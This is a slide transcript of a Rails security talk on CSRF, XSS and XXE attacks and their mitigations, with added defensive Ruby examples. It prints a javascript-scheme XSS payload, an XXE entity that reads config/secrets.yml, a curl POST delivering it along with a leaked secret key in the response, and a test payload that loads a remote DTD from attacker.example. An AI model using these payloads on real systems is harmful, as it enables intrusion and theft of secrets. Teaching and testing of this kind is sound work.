
Security is Broken: Understanding Common Vulnerabilities

The Internet is built on technologies that were never meant to work together. Basic features of seemingly simple and innocuous technologies, such as XML, left those technologies insecure. In this session we'll talk about how attackers exploit well-known vulnerabilities like XSS, XXE, and CSRF, and how to make more secure software by avoiding the kinds of decisions that led to these exploits.

Eileen M. Uchitelle

May 24, 2016

Transcript

  1. SECURITY IS BROKEN
    Understanding Common Vulnerabilities

  2. EILEEN M. UCHITELLE
    Security, Infrastructure & Performance Team at Basecamp
    eileencodes.com
    @eileencodes
    speakerdeck.com/eileencodes

  3. OPEN SOURCE
    Rails Committers
    Rails Security

  6. How is security broken?

  9. How is security broken?
    • Impossible to test for all possible vulnerabilities
    • Hackers are always one step ahead
    • Patching one vulnerability can lead to exposing new ones

  10. How did we get here?

  11. How did we get here?
    • Failed to enforce web standards

  15. “...completely failed to come up with
    even the most rudimentary usable
    frameworks for understanding the
    security of modern software.”
    – Michal Zalewski, The Tangled Web

  16. How did we get here?
    • Failed to enforce web standards
    • Failed to implement a definition of security
    • Too few people understand the vulnerabilities

  19. CSRF
    Cross-Site Request Forgery

  20. EXPLOITING CSRF

  22. Comment form: Name / Email / Website fields

  24. Looks the same, different URL

  25. Attacker's copy of the comment form: Name / Email / Website fields

  26. Attacker's copy of the form, delivered in an email

  27. Attacker's copy of the form, set to auto-submit

  28. Attacker's copy of the form, auto-submitted to the victim site

  29. Attacker’s email

  30. How dangerous are CSRF attacks?

  31. How to mitigate CSRF?

  32. How to mitigate CSRF?
    • Use built-in framework CSRF protection

  34. class ApplicationController < ActionController::Base
      protect_from_forgery with: :exception
    end

  35. <input type="hidden" name="authenticity_token" value="..." />
    Name / Email / Website fields

    CSRF protection: the form now carries the hidden authenticity token field
  36. Caveat: CSRF protection in Rails is order-dependent

  37. class ApplicationController < ActionController::Base
      before_action :authenticate
      # Conditional authentication: the CSRF token is only verified when
      # the request authenticated through the web (session) path
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end

  39. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end

    class OtherController < ApplicationController
      skip_before_action :authenticate                    # skip auth callback
      before_action :authenticate_method, only: :create
    end

    Skip auth callback: OtherController drops the inherited :authenticate
    callback and adds its own authenticate_method for create. Callbacks run
    in declaration order, so the protect_from_forgery callback inherited from
    ApplicationController runs, and evaluates its if: condition, before
    authenticate_method has run for this controller.

  41. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end

    class OtherController < ActionController::Base
      # No :authenticate callback exists on ActionController::Base, so this
      # skip is a no-op (Rails 5 raises for an unknown callback unless
      # raise: false is passed)
      skip_before_action :authenticate
      before_action :authenticate_method, only: :create
      # Declared after the authentication callback, so the if: condition
      # is evaluated once authenticate_method has run
      protect_from_forgery with: :exception,
        if: -> { authenticate_method.web? }
    end

  45. class SessionsController < ApplicationController
      def destroy
        sign_out
        reset_session        # new session, new authenticity token
        redirect_to sign_in_url
      end
    end
    Refreshes Authenticity Token

  46. How to mitigate CSRF?
    • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    • Refresh tokens with the session / don’t reuse tokens
    • Mitigate XSS attacks
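
    An added, stdlib-only Ruby model of the tokens behind the first three bullets (this is not Rails' own code and not from the deck's examples repository): a session secret that reset_session rotates, masked tokens so each rendered form carries a different value, Rails 5-style per-form tokens, and the server-side check. The Session class, the token length and the "path#method" per-form identifier are assumptions modelled on how Rails does it.

```ruby
require 'securerandom'
require 'openssl'

# Added example, not Rails' own code: a stdlib-only model of the tokens behind
# protect_from_forgery. Session stands in for the Rails session store; the
# token length and the "path#method" per-form identifier are assumptions
# modelled on Rails 4.2/5, not copied from it.
TOKEN_LENGTH = 32   # 32 bytes: also the size of an HMAC-SHA256 digest

class Session
  attr_reader :csrf_token

  def initialize
    reset!
  end

  # What reset_session does for CSRF: a new session gets a new secret, so a
  # token captured before logout stops validating afterwards.
  def reset!
    @csrf_token = SecureRandom.random_bytes(TOKEN_LENGTH)
  end
end

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Masking: XOR the secret with a fresh one-time pad and emit pad || masked, so
# every rendered form carries a different value for the same secret (this is
# what keeps a compression oracle such as BREACH from guessing it).
def mask(raw)
  pad = SecureRandom.random_bytes(TOKEN_LENGTH)
  [pad + xor_bytes(pad, raw)].pack('m0')   # strict base64, no newlines
end

def unmask(encoded)
  bytes = encoded.to_s.unpack1('m0')       # ArgumentError on bad base64
  return nil unless bytes.bytesize == 2 * TOKEN_LENGTH
  xor_bytes(bytes[0, TOKEN_LENGTH], bytes[TOKEN_LENGTH, TOKEN_LENGTH])
rescue ArgumentError
  nil
end

# Per-form token (Rails 5): HMAC over "path#method" keyed with the session
# secret, so a token minted for one form is useless on every other endpoint.
def per_form_token(session, path, method)
  OpenSSL::HMAC.digest('SHA256', session.csrf_token, "#{path}##{method.to_s.downcase}")
end

# Constant-time comparison: a plain == stops at the first differing byte and
# leaks how much of the token was right.
def secure_compare(a, b)
  return false unless a && b && a.bytesize == b.bytesize
  xor_bytes(a, b).bytes.reduce(0, :|).zero?
end

# Value for <input type="hidden" name="authenticity_token"> in a form.
def form_token(session)
  mask(session.csrf_token)
end

def form_token_for(session, path, method)
  mask(per_form_token(session, path, method))
end

# Server-side check for a state-changing request: accept the session-wide
# token or a per-form token bound to exactly this path and method.
def valid_request?(session, submitted, path, method)
  raw = unmask(submitted)
  return false if raw.nil?
  secure_compare(raw, session.csrf_token) ||
    secure_compare(raw, per_form_token(session, path, method))
end

# The attack from the slides, then each mitigation in turn.
def csrf_demo
  session = Session.new
  legit = form_token(session)                               # from the real form
  comment_token = form_token_for(session, '/comments', 'POST')
  results = {}
  results[:real_form] = valid_request?(session, legit, '/comments', 'POST')
  # attacker's look-alike form auto-submits without a token ...
  results[:forged_no_token] = valid_request?(session, nil, '/comments', 'POST')
  # ... or with one minted for the attacker's own session
  results[:forged_other_session] = valid_request?(session, form_token(Session.new), '/comments', 'POST')
  # a per-form token is only good for its own path and method
  results[:per_form_own_action] = valid_request?(session, comment_token, '/comments', 'POST')
  results[:per_form_other_action] = valid_request?(session, comment_token, '/users', 'POST')
  # logout: reset_session rotates the secret and the old token dies with it
  session.reset!
  results[:after_reset] = valid_request?(session, legit, '/comments', 'POST')
  results
end
```

    In a real app the framework does all of this; the point of running it is to see which forged requests fail and why: the attacker's auto-submitted form cannot read the victim's token, a token from another session or another form does not match, and a token captured before logout dies with reset_session.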

  48. XSS
    Cross-Site Scripting

  49. EXPLOITING STORED XSS

  52. Escaped HTML

  53. Profile
    <%= notice %>

    Name: <%= @user.name %>
    Email: <%= @user.email %>
    Website: <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

  54. Profile
    <%= notice %>

    Name: <%= (@user.name).html_safe %>
    Email: <%= @user.email %>
    Website: <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

    automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

  55. Unescaped HTML

  56. JavaScript Scheme

  58. javascript://example.com/%0Aalert(1)

    javascript://    JavaScript scheme
    example.com      URL
    %0A              Percent-encoded “line feed”
    alert(1)         JavaScript alert

    Why it works: after the scheme, the browser runs the rest of the URL as
    JavaScript. //example.com/ is a line comment, the decoded line feed ends
    it, and alert(1) executes. URI.parse accepts the value too, which is why
    the scheme itself has to be checked rather than the URL's shape.

  63. How dangerous are XSS attacks?

  64. How to mitigate XSS?

  65. How to mitigate XSS?
    • Always escape user-provided data

  66. Profile template from slide 54, rendering
    Name: <%= (@user.name).html_safe %>
    Don’t do this

  69. Profile
    <%= notice %>

    Name: <%= sanitize(@user.name) %>
    Email: <%= @user.email %>
    Website: <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

    sanitize will strip out unwanted tags and attributes

  70. How to mitigate XSS?
    • Don’t mark user-provided data html_safe (that switches escaping off)
    • Sanitize user-provided data
    • Validate user-provided data

  71. class User < ActiveRecord::Base
      WHITELISTED_URI_SCHEMES = %w( http https )
      validate :check_uri_scheme

      private

      def check_uri_scheme
        begin
          uri = URI.parse(website)
          # uri.scheme is nil for a relative URL such as "example.com/page";
          # to_s turns nil into "" so the empty scheme is rejected instead
          # of raising NoMethodError
          unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.to_s.downcase)
            errors.add :website, 'is not an allowed URI scheme'
          end
        rescue URI::InvalidURIError
          errors.add :website, 'is not a valid URI'
        end
      end
    end
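
    The validation above as a runnable function, together with the cases a bare uri.scheme.downcase mishandles and the escaping the profile template relies on. This is an added example, not the deck's code; the case table and the profile_html helper are constructed for it.

```ruby
require 'uri'
require 'erb'

# Added example, not the deck's code: the scheme allow-list from the User model
# as a plain function, plus the escaping the profile template relies on. The
# case table and profile_html are constructed for this example.
ALLOWED_SCHEMES = %w[http https].freeze

# True only for a parseable absolute URL whose scheme is http or https.
# Relative and protocol-relative URLs have no scheme (nil): .to_s turns that
# into "" instead of raising NoMethodError, and "" is not on the list. Input
# that URI.parse refuses (raw newlines, tabs, quotes) is rejected too, which
# is the safe direction for a value that will end up inside an href.
def allowed_website?(url)
  uri = URI.parse(url.to_s)
  ALLOWED_SCHEMES.include?(uri.scheme.to_s.downcase)
rescue URI::InvalidURIError
  false
end

# The profile's "Website:" link. The name is HTML-escaped (what ERB does by
# default until html_safe switches it off); the href is only emitted when the
# scheme check passes. Escaping alone would not help with the link, because
# javascript://example.com/%0Aalert(1) contains nothing that escaping touches.
def profile_html(name, website)
  safe_name = ERB::Util.html_escape(name)
  link = if allowed_website?(website)
           %(<a href="#{ERB::Util.html_escape(website)}">website</a>)
         else
           'no website'
         end
  "<p>Name: #{safe_name}</p><p>Website: #{link}</p>"
end

# Constructed inputs: the slide's payload and its neighbours.
WEBSITE_CASES = {
  'http://example.com'                   => true,
  'HTTPS://EXAMPLE.COM/'                 => true,  # scheme is case-insensitive
  'javascript://example.com/%0Aalert(1)' => false, # the slide's payload
  'JavaScript:alert(1)'                  => false, # mixed case does not help
  'data:text/html;base64,PHNjcmlwdD4='   => false, # other active schemes
  '//evil.example/'                      => false, # protocol-relative: no scheme
  'example.com'                          => false, # relative: scheme is nil
  "javascript:\nalert(1)"                => false  # raw newline: not a valid URI
}.freeze

def website_check_results
  WEBSITE_CASES.keys.to_h { |url| [url, allowed_website?(url)] }
end
```

    Rejecting on URI::InvalidURIError is deliberate: browsers are far more forgiving than URI.parse, so a value the parser cannot classify should not be stored, let alone linked.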

  75. XXE
    XML eXternal Entity Attack

  76. ]>                    (end of the DOCTYPE declaring ext1)

    Groceries
    Take Arya to the vet
    &ext1;                  Entity reference
    Do laundry
    Get car oil changed


  78. Book flight to San Francisco
    Finish Security Talk

  79. Groceries
    Take Arya to the vet
    Book flight to San Francisco
    Finish Security Talk
    Pick up beer
    Do laundry

  80. EXPLOITING XXE

  81. class UsersController < ApplicationController
      def create
        # the XML request body has already been turned into params by the
        # XML params parser (a separate gem since Rails 4) before this runs
        @user = User.new(user_params)
        respond_to do |format|
          if @user.save
            format.html { redirect_to @user }
            format.xml  { render xml: @user.to_xml }          # XML
          else
            format.html { render :new }
            format.xml  { render xml: @user.errors.to_xml }   # XML
          end
        end
      end
    end

  83. config/secrets.yml">      Requested file
    ]>

    &name;                      Entity reference

  86. curl -X 'POST' \
      -H 'Content-Type: application/xml' \
      -d @xxe.xml \                           Payload
      http://vulnerablesite.com/users.xml
    POST request to users create

  88. curl -X 'POST' \
      -H 'Content-Type: application/xml' \
      -d @xxe.xml \
      http://vulnerablesite.com/users.xml

    Response, with the requested file where the user’s name should be:
    ...
    production:
      secret_key_base: 271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c4000e166a9a5
    ...

  90. How dangerous are XXE attacks?

  92. How to mitigate XXE?

  93. How to mitigate XXE?
    • Don’t parse XML

  94. Don’t parse XML

  95. How to mitigate XXE?
    • Don’t parse XML
    • Don’t use parsers that allow entity replacement (LibXML)

  96. >> LibXML::XML.default_substitute_entities
    => true

  97. How to mitigate XXE?
    • Don’t parse XML
    • Don’t use parsers that allow entity replacement (LibXML)
    • Whitelist known entities
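
    The last bullet as a runnable pre-parse guard, applied to the to-do list from the earlier slides and to a payload shaped like xxe.xml. This is an added example, not the deck's code: REXML stands in for the parser because it ships with Ruby, and the entity names, file path and allow-list are constructed for it.

```ruby
require 'rexml/document'

# Added example, not the deck's code: a pre-parse guard for the "whitelist
# known entities" bullet, run on the to-do list from the earlier slides and on
# a payload shaped like xxe.xml. REXML only does the parse step because it
# ships with Ruby; the guard itself does not depend on the parser. The entity
# names, file path and allow-list are constructed for this example.
class UnsafeXmlError < StandardError; end

# Entities the application declared itself and is willing to expand, plus the
# five predefined XML entities.
ALLOWED_ENTITIES = %w[ext1 lt gt amp quot apos].freeze

# One <!ENTITY ...> declaration in the internal DTD subset. XML requires
# whitespace between the name and either the quoted value or SYSTEM/PUBLIC,
# so the third group is non-nil exactly for external entities.
ENTITY_DECL = /<!ENTITY\s+(%\s+)?([^\s>]+)\s+(SYSTEM|PUBLIC)?/i

# Reject parameter entities, external entities and any general entity that is
# not on the allow-list, before any parser has seen the document.
def check_entities!(xml)
  xml.scan(ENTITY_DECL).each do |param, name, external|
    raise UnsafeXmlError, "parameter entity %#{name} not allowed" if param
    raise UnsafeXmlError, "external entity #{name} not allowed" if external
    raise UnsafeXmlError, "undeclared entity #{name}" unless ALLOWED_ENTITIES.include?(name)
  end
  xml
end

# Parse a to-do list and return its items with entities expanded.
def todo_items(xml)
  doc = REXML::Document.new(check_entities!(xml))
  REXML::XPath.match(doc, '/todos/item').map(&:text)
end

def rejected?(xml)
  check_entities!(xml)
  false
rescue UnsafeXmlError
  true
end

# Constructed input: the slides' list, with ext1 declared as an internal
# entity the application itself controls.
TODO_XML = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE todos [
    <!ENTITY ext1 "Pick up beer">
  ]>
  <todos>
    <item>Groceries</item>
    <item>Take Arya to the vet</item>
    <item>&ext1;</item>
    <item>Do laundry</item>
  </todos>
XML

# Constructed payload in the shape of the deck's xxe.xml: a SYSTEM entity
# pointing at a local file, referenced from the user's name.
XXE_XML = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE user [
    <!ENTITY name SYSTEM "file:///srv/app/config/secrets.yml">
  ]>
  <user><name>&name;</name></user>
XML

# Parameter entities are the usual route to pulling in a remote DTD.
PARAM_XML = <<~XML
  <!DOCTYPE user [
    <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
    %dtd;
  ]>
  <user><name>x</name></user>
XML
```

    With libxml-ruby you would still turn LibXML::XML.default_substitute_entities off; the guard is what lets you keep the one entity you declared yourself without accepting every entity a client declares.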

  98. Investigate vulnerabilities & patches
    SECURITY

  99. GitHub: eileencodes/security_examples

  100. owasp.org

  102. Brakeman

  103. Resilience & empowerment
    SECURITY

  105. Awareness of vulnerabilities
    SECURITY

  107. To the future

  108. EILEEN M. UCHITELLE
    Security, Infrastructure & Performance Team at Basecamp
    eileencodes.com
    @eileencodes
    speakerdeck.com/eileencodes
